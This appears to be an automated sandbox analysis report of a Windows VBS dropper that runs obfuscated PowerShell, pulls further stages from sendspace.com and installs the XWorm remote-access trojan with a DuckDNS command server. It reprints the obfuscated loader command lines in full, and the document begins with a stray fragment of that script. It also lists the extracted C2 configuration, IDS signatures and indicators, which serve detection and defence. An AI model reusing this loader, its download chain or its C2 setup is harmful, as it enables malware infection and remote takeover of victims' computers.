rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssige

              Snort Signatures

              Timestamp:05/23/24-18:27:12.688536
              SID:2852870
              Source Port:8895
              Destination Port:49713
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-18:27:12.688536
              SID:2852874
              Source Port:8895
              Destination Port:49713
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-18:26:11.361514
              SID:2855924
              Source Port:49713
              Destination Port:8895
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: rachesxwdavid.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.9:49713 -> 57.128.155.22:8895
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8895 -> 192.168.2.9:49713
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8895 -> 192.168.2.9:49713
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: rachesxwdavid.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: rachesxwdavid.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.9:49713 -> 57.128.155.22:8895
              Source: Joe Sandbox ViewIP Address: 57.128.155.22 57.128.155.22
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n1.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n5.sendspace.comConnection: Keep-AliveCookie: SID=asnkose8meuts76a32vtsvb0k7
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n1.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n5.sendspace.comConnection: Keep-AliveCookie: SID=asnkose8meuts76a32vtsvb0k7
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n1.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n5.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: rachesxwdavid.duckdns.org
              Source: powershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n1.sendspace.com
              Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspaX
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C8220F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.comx
              Source: wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n5.sendspace.com/
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n5.sendspace.com/Ezo8
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n5.sendspace.com/om:443t
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n5.sendspace.com/yz
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000011.00000002.2594401027.0000000021320000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16
              Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16/u28
              Source: powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdP
              Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdXR
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7308.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7588.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7125
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7125
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7125Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886ECC8569_2_00007FF886ECC856
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886ECC3599_2_00007FF886ECC359
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886ECD6029_2_00007FF886ECD602
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_02A7DD8017_2_02A7DD80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_02A7F2A017_2_02A7F2A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2401B2B017_2_2401B2B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24017A3017_2_24017A30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2401BB8017_2_2401BB80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24010F4817_2_24010F48
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2401AF6817_2_2401AF68
              Source: windows.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi64_7308.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7588.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/7@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Briarberry.MilJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\HS0J0ha2f3izEQny
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izhnjtxg.3t0.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7308
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7588
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
